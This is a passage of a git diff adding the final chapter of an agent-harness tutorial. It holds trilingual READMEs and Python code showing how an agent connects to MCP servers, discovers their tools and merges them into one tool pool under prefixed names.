.worktrees/ + .mailboxes/) + + + + create + bind + + + + create + bind + + + + Alice: .worktrees/auth/ + branch: wt/auth-refactor + Task: 重构认证模块 + ✓ 隔离,不影响 Bob 和主仓库 + + + + Bob: .worktrees/ui/ + branch: wt/ui-login + Task: 重构 UI 登录页 + ✓ 隔离,不影响 Alice 和主仓库 + + + + 事件日志: .worktrees/events.jsonl → create / remove / keep + + + 收尾: keep (保留分支 review) / remove (删除+标记完成) + + + + + s17: idle_poll + auto_claim + protocols + WORK/IDLE lifecycle + + s18: create_worktree + bind_task + remove/keep + events.jsonl (Lead 13→16) + diff --git a/s19_mcp_plugin/README.en.md b/s19_mcp_plugin/README.en.md new file mode 100644 index 000000000..58e5c7591 --- /dev/null +++ b/s19_mcp_plugin/README.en.md @@ -0,0 +1,239 @@ +# s19: MCP Plugin — Need More Power? Plug In External Tools + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s17 → s18 → `s19` + +> *"Need more power? Plug in MCP"* — Multi-transport, channel routing, tool pool merging. +> +> **Harness layer**: Plugins — External capabilities via a standard protocol. + +--- + +## The Problem + +From s01 through s18, every tool the agent uses was hand-written by you — bash, read, write, task, todo_write. You write the code for each tool's input validation, execution logic, and error handling. + +But now you have 3 external services you want to integrate into the agent: the company's Jira API (query issues, create tickets), an in-house deployment system (trigger deploys, view logs), and the team's Notion knowledge base (search docs, create pages). You don't want to rewrite tool code for every service. + +You need a standard protocol — as long as an external service implements this protocol, the agent can call its tools directly, regardless of what language the service is written in. + +--- + +## The Solution + +![MCP Architecture](images/mcp-architecture.en.svg) + +MCP (Model Context Protocol) defines how agents discover and invoke external tools. Core concepts: + +| Concept | Purpose | +|------|------| +| MCPClient | The agent-side client — connects to servers, discovers tools, invokes tools | +| MCP Server | The external service side — implements `tools/list` + `tools/call` | +| assemble_tool_pool | Merges built-in tools and MCP tools into a single pool | +| mcp\_\_server\_\_tool naming | Prevents tool name collisions across different servers | + +All s18 capabilities preserved (worktree isolation, auto-claiming, idle polling, protocol system). One addition: the `connect_mcp` tool — connect to external services, discover tools, merge into the tool pool. + +--- + +## How It Works + +### MCPClient: Discovery + Invocation + +```python +class MCPClient: + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs, handlers): + """Simulates tools/list discovery.""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Simulates tools/call.""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + return handler(**args) +``` + +The tutorial uses mock handlers to simulate stdio JSON-RPC. The real version would spawn a subprocess, sending `tools/list` and `tools/call` requests via stdin/stdout. + +### connect_mcp: Connect + Discover + +```python +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + factory = MOCK_SERVERS.get(name) + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + return f"Connected to '{name}'. Discovered: {', '.join(tool_names)}" +``` + +After connecting, the server's tools are immediately available. + +### assemble_tool_pool: Merge + +```python +def assemble_tool_pool() -> tuple[list[dict], dict]: + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = ( + lambda **kw, c=mcp_client, t=tool_def["name"]: c.call_tool(t, kw)) + return tools, handlers +``` + +The prefix `mcp__{server}__{tool}` prevents tool name collisions across different servers. After calling `connect_mcp`, the agent_loop automatically re-assembles, making new tools immediately available. + +--- + +## Changes from s18 + +| Component | Before (s18) | After (s19) | +|------|-----------|-----------| +| Tool source | All hand-written built-in | Hand-written + MCP external tools with dynamic discovery | +| Tool pool | Fixed BUILTIN_TOOLS | assemble_tool_pool dynamically merges mcp\_\_ prefixed tools | +| New type | — | MCPClient class (simulates tools/list + tools/call) | +| Namespace | — | mcp\_\_server\_\_tool prevents collisions | +| Lead tools | 16 (s18) | 17 (+connect_mcp) | +| Extension method | Write code to add tools | Standard protocol, implement servers in any language | + +--- + +## Try It Out + +```sh +cd learn-claude-code +python s19_mcp_plugin/code.py +``` + +Try these prompts: + +1. `Connect to the docs MCP server and search for something` +2. `Connect to the deploy server and trigger a deployment` +3. `Connect both servers — what tools are now available?` + +What to observe: After connecting to an MCP server, do tool names have `mcp__docs__` or `mcp__deploy__` prefixes? Are both servers' tools available simultaneously? + +--- + +## You Made It Here + +This is the final chapter. Looking back at the road you've traveled: + +``` +s01-s04 Tool pipeline loop → dispatch → permission → hooks +s05-s08 Single-agent planning → subagent → skill → compact +s09-s11 Knowledge memory → prompt → error recovery +s12-s14 Persistent work task graph → background → cron +s15-s19 Multi-agent teams → protocols → autonomy → worktree → MCP +``` + +You've built a complete agent harness from scratch. 19 chapters, each adding one mechanism. Every mechanism hooks onto the same while True loop — the loop itself, unchanged. + +
+Deep Dive into CC Source + +> The following is based on complete analysis of CC source: `services/mcp/client.ts` (3348 lines), `auth.ts` (2466 lines), `config.ts` (1579 lines), `channelNotification.ts` (317 lines). + +### 1. Six Transport Types + +The tutorial only shows stdio. CC supports 6 transport types (`types.ts:23-25`): + +| Transport | Communication method | +|-----------|---------| +| `stdio` | Subprocess stdin/stdout (cross-platform default) | +| `sse` | HTTP Server-Sent Events | +| `http` | Streamable HTTP (POST/SSE bidirectional) | +| `ws` | WebSocket | +| `sse-ide` | IDE-embedded SSE transport | +| `sdk` | In-process SDK transport | + +On connection, local (stdio) and remote (http/sse/ws) servers are batched concurrently: local batch of 3, remote batch of 20. + +### 2. Tool Pool Merging Algorithm + +`assembleToolPool()` (`tools.ts:345-367`): + +```typescript +// Dedup with priority: built-in tools win on name collision (sorted first) +return uniqBy( + [...builtInTools.sort(byName), ...filteredMcpTools.sort(byName)], + 'name', +) +``` + +**Key detail**: Built-in and MCP tools are sorted separately, not together. The reason is CC's `claude_code_system_cache_policy` places a global cache breakpoint after the last built-in tool at a specific position — mixing the sort would break this design. + +### 3. Naming Convention: `mcp__server__tool` + +`buildMcpToolName()` (`mcpStringUtils.ts:50-52`): + +``` +mcp____ +``` + +All non-`[a-zA-Z0-9_-]` characters are replaced with `_`. For example, `slack` server's `post_message` → `mcp__slack__post_message`. + +### 4. Channel Notifications: Servers Push Messages Back + +The tutorial only covers agent → MCP Server unidirectional calls. CC also supports **reverse notifications** (`channelNotification.ts`): + +1. Server declares `capabilities.experimental['claude/channel']` +2. Server sends messages to agent via MCP notification `notifications/claude/channel` +3. Messages are wrapped in `...` XML tags +4. Agent is woken up by SleepTool (within 1 second) + +Servers can also request permissions: `notifications/claude/channel/permission_request` → Agent replies `notifications/claude/channel/permission`. Users confirm/deny via a 5-letter short ID. + +### 5. OAuth Authentication Flow + +CC's MCP authentication (`auth.ts`, 2466 lines) supports a full OAuth 2.0 + PKCE flow: +- OAuth metadata discovery via public client + PKCE (RFC 8414 / RFC 9728) +- Local callback server receives authorization code +- Tokens persisted via `getSecureStorage()` (macOS Keychain / Linux encrypted file / Windows Credential Manager) +- Auto-refresh 5 minutes before expiry +- Cross-application access (XAA): browser gets id_token → RFC 8693 + RFC 7523 exchange → no repeated browser popups + +### 6. Configuration Sources and Priority + +MCP server configuration comes from 6 sources, from lowest to highest priority (`config.ts:1071-1251`): + +``` +plugins > claude.ai connectors > user settings.json > project .mcp.json > local settings.local.json +``` + +Same-name servers are deduplicated by content signature. When enterprise `managed-mcp.json` exists, all other configurations are excluded. + +### 7. Connection Lifecycle Error Handling + +CC has fine-grained error classification and retry for MCP connections (`client.ts:1266-1402`): +- **Terminal errors** (ECONNRESET, ETIMEDOUT, EPIPE, etc.): 3 consecutive failures → close + reconnect +- **Tool call 401**: Token expired → throw `McpAuthError` → trigger re-authentication +- **Tool call timeout**: `Promise.race` timeout (configurable, default ~28 hours) +- **Stdio disconnect**: Kill process in SIGINT → SIGTERM → SIGKILL order + +### The Tutorial's Simplifications Are Intentional + +- 6 transport types → 1 (stdio): Manageable concept count +- Channel reverse notifications → omitted: Tutorial agent is always the initiator +- OAuth flow → omitted: Tutorial assumes servers need no auth +- 6-layer config priority → omitted: Tutorial passes server_command directly +- Complex error classification → omitted: Tutorial uses try/except as fallback + +
+ + diff --git a/s19_mcp_plugin/README.ja.md b/s19_mcp_plugin/README.ja.md new file mode 100644 index 000000000..e1f31d185 --- /dev/null +++ b/s19_mcp_plugin/README.ja.md @@ -0,0 +1,239 @@ +# s19: MCP Plugin — 能力が足りない?外部ツールをプラグイン + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s17 → s18 → `s19` + +> *"能力が足りない?MCP をプラグイン"* — マルチトランスポート、チャネルルーティング、ツールプール統合。 +> +> **Harness 層**: プラグイン — 外部能力を標準プロトコルで接続。 + +--- + +## 課題 + +s01 から s18 まで、Agent が使用する全てのツールは自分で書いたもの — bash、read、write、task、todo_write。各ツールの入力検証、実行ロジック、エラーハンドリングのコードを自分で実装する。 + +しかし今、Agent に統合したい外部サービスが 3 つある:社内の Jira API(issue 検索、ticket 作成)、独自のデプロイシステム(deploy トリガー、ログ閲覧)、チームの Notion ナレッジベース(ドキュメント検索、ページ作成)。各サービスのためにツールコードを書き直したくない。 + +標準プロトコルが必要 — 外部サービスがこのプロトコルを実装していれば、サービスが何の言語で書かれていても、Agent は直接そのツールを呼び出せる。 + +--- + +## ソリューション + +![MCP Architecture](images/mcp-architecture.ja.svg) + +MCP(Model Context Protocol)は、Agent が外部ツールを発見・呼び出しする方法を定義。核心概念: + +| 概念 | 目的 | +|------|------| +| MCPClient | Agent 側のクライアント — server に接続、ツールを発見、ツールを呼び出し | +| MCP Server | 外部サービス側 — `tools/list` + `tools/call` を実装 | +| assemble_tool_pool | 組み込みツールと MCP ツールを一つのプールに統合 | +| mcp\_\_server\_\_tool 命名 | 異なる server 間のツール名衝突を防止 | + +s18 の全機能を保持(worktree 隔離、自動認領、空き時ポーリング、プロトコルシステム)。1 つの追加:`connect_mcp` ツール — 外部サービスに接続、ツールを発見、ツールプールに統合。 + +--- + +## 仕組み + +### MCPClient:発見 + 呼び出し + +```python +class MCPClient: + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs, handlers): + """Simulates tools/list discovery.""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Simulates tools/call.""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + return handler(**args) +``` + +チュートリアル版は mock handler で stdio JSON-RPC をシミュレート。実際の版はサブプロセスを起動し、stdin/stdout で `tools/list` と `tools/call` リクエストを送信。 + +### connect_mcp:接続 + 発見 + +```python +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + factory = MOCK_SERVERS.get(name) + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + return f"Connected to '{name}'. Discovered: {', '.join(tool_names)}" +``` + +接続後、server が提供するツールが即座に利用可能。 + +### assemble_tool_pool:統合 + +```python +def assemble_tool_pool() -> tuple[list[dict], dict]: + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = ( + lambda **kw, c=mcp_client, t=tool_def["name"]: c.call_tool(t, kw)) + return tools, handlers +``` + +プレフィックス `mcp__{server}__{tool}` で異なる server 間のツール名衝突を防止。`connect_mcp` 呼び出し後、agent_loop が自動的に再 assemble し、新しいツールが即座に利用可能。 + +--- + +## s18 からの変更 + +| コンポーネント | 変更前 (s18) | 変更後 (s19) | +|--------------|------------|------------| +| ツールソース | 全て手書き builtin | 手書き + MCP 外部ツール動的発見 | +| ツールプール | 固定 BUILTIN_TOOLS | assemble_tool_pool が動的に mcp\_\_ プレフィックスツールを統合 | +| 新規タイプ | — | MCPClient クラス(tools/list + tools/call をシミュレート) | +| 名前空間 | — | mcp\_\_server\_\_tool 衝突防止 | +| Lead ツール | 16 (s18) | 17 (+connect_mcp) | +| 拡張方法 | ツール追加のコードを書く | 標準プロトコル、任意言語で server を実装 | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s19_mcp_plugin/code.py +``` + +以下のプロンプトを試してください: + +1. `Connect to the docs MCP server and search for something` +2. `Connect to the deploy server and trigger a deployment` +3. `Connect both servers — what tools are now available?` + +観察ポイント:MCP server 接続後、ツール名に `mcp__docs__` や `mcp__deploy__` プレフィックスが付いているか?両方の server のツールが同時に利用可能か? + +--- + +## ここまで来た + +これが最終章。歩んできた道を振り返る: + +``` +s01-s04 ツールパイプライン loop → dispatch → permission → hooks +s05-s08 単体 Agent 能力 planning → subagent → skill → compact +s09-s11 知識と韧性 memory → prompt → error recovery +s12-s14 永続的作業 task graph → background → cron +s15-s19 マルチ Agent teams → protocols → autonomy → worktree → MCP +``` + +ゼロから完全な Agent の harness を構築した。19 の章、各章は 1 つの仕組みを追加。各仕組みは同じ while True ループに接続 — ループそのものは、変わっていない。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `services/mcp/client.ts`(3348 行)、`auth.ts`(2466 行)、`config.ts`(1579 行)、`channelNotification.ts`(317 行)の完全分析に基づく。 + +### 一、6 種の Transport タイプ + +チュートリアル版は stdio のみ。CC は 6 種のトランスポートをサポート(`types.ts:23-25`): + +| Transport | 通信方式 | +|-----------|---------| +| `stdio` | サブプロセス stdin/stdout(クロスプラットフォームデフォルト) | +| `sse` | HTTP Server-Sent Events | +| `http` | Streamable HTTP(POST/SSE 双方向) | +| `ws` | WebSocket | +| `sse-ide` | IDE 内蔵 SSE トランスポート | +| `sdk` | プロセス内 SDK トランスポート | + +接続時、ローカル(stdio)とリモート(http/sse/ws)サーバーをバッチで並行処理:ローカルは 3 つずつ、リモートは 20 つずつ。 + +### 二、ツールプール統合の正確なアルゴリズム + +`assembleToolPool()`(`tools.ts:345-367`): + +```typescript +// 重複排除時に組み込みツールを優先(name が同じ場合、組み込みが先) +return uniqBy( + [...builtInTools.sort(byName), ...filteredMcpTools.sort(byName)], + 'name', +) +``` + +**重要な詳細**:組み込みツールと MCP ツールは別々にソート、混ぜてソートしない。理由は CC の `claude_code_system_cache_policy` が最後の組み込みツールの後の特定位置にグローバルキャッシュブレークポイントを置く設計のため — ソートを混ぜるとこの設計が壊れる。 + +### 三、命名規則:`mcp__server__tool` + +`buildMcpToolName()`(`mcpStringUtils.ts:50-52`): + +``` +mcp____ +``` + +`[a-zA-Z0-9_-]` 以外の全文字を `_` に置換。例:`slack` サーバーの `post_message` → `mcp__slack__post_message`。 + +### 四、Channel 通知:サーバーからの逆方向メッセージ + +チュートリアル版は Agent → MCP Server の一方向呼び出しのみ。CC は**逆方向通知**もサポート(`channelNotification.ts`): + +1. Server が `capabilities.experimental['claude/channel']` を宣言 +2. Server が MCP 通知 `notifications/claude/channel` で Agent にメッセージを送信 +3. メッセージは `...` XML タグでラップ +4. Agent は SleepTool で起床(1 秒以内) + +Server は権限リクエストも可能:`notifications/claude/channel/permission_request` → Agent が `notifications/claude/channel/permission` で応答。ユーザーは 5 文字の短い ID で確認/拒否。 + +### 五、OAuth 認証フロー + +CC の MCP 認証(`auth.ts`、2466 行)は完全な OAuth 2.0 + PKCE フローをサポート: +- 公開クライアント + PKCE で OAuth メタデータを発見(RFC 8414 / RFC 9728) +- ローカルコールバックサーバーが認可コードを受信 +- トークンは `getSecureStorage()` で永続化(macOS Keychain / Linux 暗号化ファイル / Windows 資格情報マネージャー) +- 有効期限 5 分前に自動リフレッシュ +- クロスアプリケーションアクセス(XAA):ブラウザが id_token を取得 → RFC 8693 + RFC 7523 交換 → 繰り返しブラウザポップアップ不要 + +### 六、設定ソースと優先度 + +MCP サーバー設定は 6 つのソースから、低い順に(`config.ts:1071-1251`): + +``` +プラグイン > claude.ai コネクタ > ユーザー settings.json > プロジェクト .mcp.json > ローカル settings.local.json +``` + +同名サーバーはコンテンツ署名で重複排除。企業 `managed-mcp.json` が存在する場合、他の全設定を完全に除外。 + +### 七、接続ライフサイクルのエラーハンドリング + +CC は MCP 接続にきめ細かいエラー分類とリトライを行う(`client.ts:1266-1402`): +- **終局エラー**(ECONNRESET、ETIMEDOUT、EPIPE 等):連続 3 回 → クローズ + 再接続 +- **ツール呼び出し 401**:トークン期限切れ → `McpAuthError` スロー → 再認証トリガー +- **ツール呼び出しタイムアウト**:`Promise.race` タイムアウト(設定可能、デフォルト約 28 時間) +- **Stdio 切断**:SIGINT → SIGTERM → SIGKILL の順でプロセスを kill + +### チュートリアル版の簡略化は意図的 + +- 6 種のトランスポート → 1 種(stdio):概念量を管理可能に +- Channel 逆方向通知 → 省略:チュートリアル版 Agent は常にイニシエータ +- OAuth フロー → 省略:チュートリアル版は server が認証不要と仮定 +- 6 層の設定優先度 → 省略:チュートリアル版は直接 server_command を渡す +- 複雑なエラー分類 → 省略:チュートリアル版は try/except でフォールバック + +
+ + diff --git a/s19_mcp_plugin/README.md b/s19_mcp_plugin/README.md new file mode 100644 index 000000000..2a624dbc9 --- /dev/null +++ b/s19_mcp_plugin/README.md @@ -0,0 +1,239 @@ +# s19: MCP Plugin — 能力不够?插上外接工具 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s17 → s18 → `s19` + +> *"能力不够? 插上 MCP"* — 多传输、通道路由、工具池合并。 +> +> **Harness 层**: 插件 — 外部能力通过标准协议接入。 + +--- + +## 问题 + +从 s01 到 s18,Agent 用的所有工具都是你手写的——bash、read、write、task、todo_write。你自己写代码实现每个工具的输入验证、执行逻辑、错误处理。 + +但现在你有 3 个外部服务想接入 Agent:公司的 Jira API(查 issue、创建 ticket)、自建的部署系统(触发 deploy、查看日志)、团队的 Notion 知识库(搜索文档、创建页面)。你不想为每个服务重写一套工具代码。 + +你需要一套标准协议——只要外部服务实现了这个协议,Agent 就能直接调用它的工具,不管服务是用什么语言写的。 + +--- + +## 解决方案 + +![MCP Architecture](images/mcp-architecture.svg) + +MCP(Model Context Protocol)定义了 Agent 如何发现和调用外部工具。核心概念: + +| 概念 | 作用 | +|------|------| +| MCPClient | Agent 这边的客户端,连接 server、发现工具、调用工具 | +| MCP Server | 外部服务那边,实现 `tools/list` + `tools/call` | +| assemble_tool_pool | 把内置工具和 MCP 工具合并成一个池子 | +| mcp\_\_server\_\_tool 命名 | 避免不同 server 的工具名冲突 | + +s18 的全部能力保留(worktree 隔离、自主认领、空闲轮询、协议系统)。新增一样:`connect_mcp` 工具——连接外部服务,发现工具,合并到工具池。 + +--- + +## 工作原理 + +### MCPClient:发现 + 调用 + +```python +class MCPClient: + def __init__(self, name: str): + self.name = name + self.tools: list[dict] = [] + self._handlers: dict[str, callable] = {} + + def register(self, tool_defs, handlers): + """Simulates tools/list discovery.""" + self.tools = tool_defs + self._handlers = handlers + + def call_tool(self, tool_name: str, args: dict) -> str: + """Simulates tools/call.""" + handler = self._handlers.get(tool_name) + if not handler: + return f"MCP error: unknown tool '{tool_name}'" + return handler(**args) +``` + +教学版用 mock handler 模拟 stdio JSON-RPC。真实版会启动子进程,通过 stdin/stdout 发送 `tools/list` 和 `tools/call` 请求。 + +### connect_mcp:连接 + 发现 + +```python +def connect_mcp(name: str) -> str: + """Connect to an MCP server and discover its tools.""" + factory = MOCK_SERVERS.get(name) + mcp_client = factory() + mcp_clients[name] = mcp_client + tool_names = [t["name"] for t in mcp_client.tools] + return f"Connected to '{name}'. Discovered: {', '.join(tool_names)}" +``` + +连接后,server 提供的工具立即可用。 + +### assemble_tool_pool:合并 + +```python +def assemble_tool_pool() -> tuple[list[dict], dict]: + tools = list(BUILTIN_TOOLS) + handlers = dict(BUILTIN_HANDLERS) + for server_name, mcp_client in mcp_clients.items(): + for tool_def in mcp_client.tools: + prefixed = f"mcp__{server_name}__{tool_def['name']}" + tools.append({ + "name": prefixed, + "description": tool_def.get("description", ""), + "input_schema": tool_def.get("inputSchema", {}), + }) + handlers[prefixed] = ( + lambda **kw, c=mcp_client, t=tool_def["name"]: c.call_tool(t, kw)) + return tools, handlers +``` + +前缀 `mcp__{server}__{tool}` 避免不同 server 的工具名冲突。调用 `connect_mcp` 后,agent_loop 自动重新 assemble,新工具立即可用。 + +--- + +## 相对 s18 的变更 + +| 组件 | 之前 (s18) | 之后 (s19) | +|------|-----------|-----------| +| 工具来源 | 全部手写 builtin | 手写 + MCP 外部工具动态发现 | +| 工具池 | 固定 BUILTIN_TOOLS | assemble_tool_pool 动态合并 mcp\_\_ 前缀工具 | +| 新类型 | — | MCPClient 类(模拟 tools/list + tools/call) | +| 命名空间 | — | mcp\_\_server\_\_tool 避免冲突 | +| Lead 工具 | 16 (s18) | 17 (+connect_mcp) | +| 扩展方式 | 写代码加工具 | 标准协议,任意语言实现 server | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s19_mcp_plugin/code.py +``` + +试试这些 prompt: + +1. `Connect to the docs MCP server and search for something` +2. `Connect to the deploy server and trigger a deployment` +3. `Connect both servers — what tools are now available?` + +观察重点:连接 MCP server 后,工具名是否带 `mcp__docs__` 或 `mcp__deploy__` 前缀?两个 server 的工具是否同时可用? + +--- + +## 你走到了这里 + +这是最后一章。回顾你走过的路: + +``` +s01-s04 工具管线 loop → dispatch → permission → hooks +s05-s08 单Agent能力 planning → subagent → skill → compact +s09-s11 知识与韧性 memory → prompt → error recovery +s12-s14 持久化工作 task graph → background → cron +s15-s19 多Agent平台 teams → protocols → autonomy → worktree → MCP +``` + +你已经从零构建了一个完整 Agent 的 harness。19 个章节,每个只加一个机制。每个机制都挂在同一个 while True 循环上——循环本身,从未改变。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `services/mcp/client.ts`(3348 行)、`auth.ts`(2466 行)、`config.ts`(1579 行)、`channelNotification.ts`(317 行)的完整分析。 + +### 一、6 种 Transport 类型 + +教学版只展示了 stdio。CC 支持 6 种传输(`types.ts:23-25`): + +| Transport | 通信方式 | +|-----------|---------| +| `stdio` | 子进程 stdin/stdout(跨平台默认) | +| `sse` | HTTP Server-Sent Events | +| `http` | Streamable HTTP(POST/SSE 双向) | +| `ws` | WebSocket | +| `sse-ide` | IDE 内嵌 SSE 传输 | +| `sdk` | 进程内 SDK 传输 | + +连接时本地(stdio)和远程(http/sse/ws)服务器分批并发:本地批量 3 个,远程批量 20 个。 + +### 二、工具池合并的精确算法 + +`assembleToolPool()`(`tools.ts:345-367`): + +```typescript +// 去重时优先保留内置工具(name 相同时内置在前) +return uniqBy( + [...builtInTools.sort(byName), ...filteredMcpTools.sort(byName)], + 'name', +) +``` + +**关键细节**:内置工具和 MCP 工具分开排序,不是合起来排。原因是 CC 的 `claude_code_system_cache_policy` 在最后一个内置工具之后的某个位置放全局缓存断点——混排会破坏这个设计。 + +### 三、命名规则:`mcp__server__tool` + +`buildMcpToolName()`(`mcpStringUtils.ts:50-52`): + +``` +mcp____ +``` + +所有非 `[a-zA-Z0-9_-]` 字符替换为 `_`。例如 `slack` 服务器的 `post_message` → `mcp__slack__post_message`。 + +### 四、Channel 通知:服务器反向推消息 + +教学版只讲了 Agent → MCP Server 的单向调用。CC 还支持**反向通知**(`channelNotification.ts`): + +1. Server 声明 `capabilities.experimental['claude/channel']` +2. Server 通过 MCP 通知 `notifications/claude/channel` 给 Agent 发消息 +3. 消息包装在 `...` XML 标签中 +4. Agent 被 SleepTool 唤醒(1 秒内) + +Server 还可以请求权限:`notifications/claude/channel/permission_request` → Agent 回复 `notifications/claude/channel/permission`。用户通过 5 字母短 ID 确认/拒绝。 + +### 五、OAuth 认证流程 + +CC 的 MCP 认证(`auth.ts`,2466 行)支持完整的 OAuth 2.0 + PKCE 流程: +- 通过公钥客户端 + PKCE 发现 OAuth 元数据(RFC 8414 / RFC 9728) +- 本地回调服务器接收授权码 +- 令牌通过 `getSecureStorage()` 持久化(macOS Keychain / Linux 加密文件 / Windows 凭据管理器) +- 过期前 5 分钟自动刷新 +- 支持跨应用访问(XAA):浏览器获取 id_token → RFC 8693 + RFC 7523 交换 → 无需反复弹浏览器 + +### 六、配置来源与优先级 + +MCP 服务器配置来自 6 个来源,优先级从低到高(`config.ts:1071-1251`): + +``` +插件 > claude.ai 连接器 > 用户 settings.json > 项目 .mcp.json > 本地 settings.local.json +``` + +同名服务器按内容签名去重。企业 `managed-mcp.json` 存在时完全排除其他配置。 + +### 七、连接生命周期的错误处理 + +CC 对 MCP 连接有精细的错误分类和重试(`client.ts:1266-1402`): +- **终局性错误**(ECONNRESET、ETIMEDOUT、EPIPE 等):连续 3 次 → 关闭 + 重连 +- **工具调用 401**:令牌过期 → 抛出 `McpAuthError` → 触发重认证 +- **工具调用超时**:`Promise.race` 超时(可配置,默认 ~28 小时) +- **Stdio 断连**:按 SIGINT → SIGTERM → SIGKILL 顺序杀进程 + +### 教学版的简化是刻意的 + +- 6 种 transport → 1 种(stdio):概念量可控 +- Channel 反向通知 → 省略:教学版 Agent 是主动方 +- OAuth 流程 → 省略:教学版假设 server 不需要认证 +- 6 层配置优先级 → 省略:教学版直接传 server_command +- 复杂的错误分类 → 省略:教学版用 try/except 兜底 + +
+ + diff --git a/s19_mcp_plugin/code.py b/s19_mcp_plugin/code.py new file mode 100644 index 000000000..f046c8a50 --- /dev/null +++ b/s19_mcp_plugin/code.py @@ -0,0 +1,933 @@ +#!/usr/bin/env python3 +""" +s19: MCP Plugin — MCPClient + tool discovery + assemble_tool_pool. + +Run: python s19_mcp_plugin/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s18: + - MCPClient class: discovers tools, calls tools via mock handler + - assemble_tool_pool: merges builtin + MCP tools into one pool + - connect_mcp: connect to an MCP server, discover tools + - Tool naming: mcp__{server}__{tool} to avoid conflicts + - agent_loop uses dynamic tool pool (builtin + MCP) + +ASCII flow: + connect_mcp("docs") → MCPClient discovers tools → + assemble_tool_pool → [builtin... , mcp__docs__search, mcp__docs__get_version] + agent_loop uses merged pool +""" + +import os, subprocess, json, time, random, threading +from pathlib import Path +from datetime import datetime +from dataclasses import dataclass, asdict, field + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Task System (from s12 + s18 worktree field) ── + +TASKS_DIR = WORKDIR / ".tasks" +TASKS_DIR.mkdir(exist_ok=True) + + +@dataclass +class Task: + id: str + subject: str + description: str + status: str + owner: str | None + blockedBy: list[str] + worktree: str | None = None + + +def _task_path(task_id: str) -> Path: + return TASKS_DIR / f"{task_id}.json" + + +def create_task(subject: str, description: str = "", + blockedBy: list[str] | None = None) -> Task: + task = Task( + id=f"task_{int(time.time())}_{random.randint(0, 9999):04d}", + subject=subject, description=description, + status="pending", owner=None, + blockedBy=blockedBy or [], + ) + save_task(task) + return task + + +def save_task(task: Task): + _task_path(task.id).write_text(json.dumps(asdict(task), indent=2)) + + +def load_task(task_id: str) -> Task: + return Task(**json.loads(_task_path(task_id).read_text())) + + +def list_tasks() -> list[Task]: + return [Task(**json.loads(p.read_text())) + for p in sorted(TASKS_DIR.glob("task_*.json"))] + + +def can_start(task_id: str) -> bool: + task = load_task(task_id) + return all(load_task(d).status == "completed" for d in task.blockedBy) + + +def claim_task(task_id: str, owner: str = "agent") -> str: + task = load_task(task_id) + if task.status != "pending": + return f"Task {task_id} is {task.status}, cannot claim" + if not can_start(task_id): + deps = [d for d in task.blockedBy if load_task(d).status != "completed"] + return f"Blocked by: {deps}" + task.owner = owner + task.status = "in_progress" + save_task(task) + print(f" \033[36m[claim] {task.subject} → in_progress\033[0m") + return f"Claimed {task.id} ({task.subject})" + + +def complete_task(task_id: str) -> str: + task = load_task(task_id) + if task.status != "in_progress": + return f"Task {task_id} is {task.status}, cannot complete" + task.status = "completed" + save_task(task) + unblocked = [t.subject for t in list_tasks() + if t.status == "pending" and t.blockedBy and can_start(t.id)] + print(f" \033[32m[complete] {task.subject} ✓\033[0m") + msg = f"Completed {task.id} ({task.subject})" + if unblocked: + msg += f"\nUnblocked: {', '.join(unblocked)}" + return msg + + +# ── Worktree System (from s18) ── + +WORKTREES_DIR = WORKDIR / ".worktrees" +WORKTREES_DIR.mkdir(exist_ok=True) + + +def run_git(args: list[str]) -> str: + try: + r = subprocess.run(["git"] + args, cwd=WORKDIR, + capture_output=True, text=True, timeout=30) + out = (r.stdout + r.stderr).strip() + return out[:5000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: git timeout" + + +def log_event(event_type: str, worktree_name: str, task_id: str = ""): + event = {"type": event_type, "worktree": worktree_name, + "task_id": task_id, "ts": time.time()} + events_file = WORKTREES_DIR / "events.jsonl" + with open(events_file, "a") as f: + f.write(json.dumps(event) + "\n") + + +def create_worktree(name: str, task_id: str = "") -> str: + path = WORKTREES_DIR / name + if path.exists(): + return f"Worktree '{name}' already exists at {path}" + result = run_git(["worktree", "add", str(path), "-b", f"wt/{name}", "HEAD"]) + if "error" in result.lower() or "fatal" in result.lower(): + return f"Git error: {result}" + if task_id: + 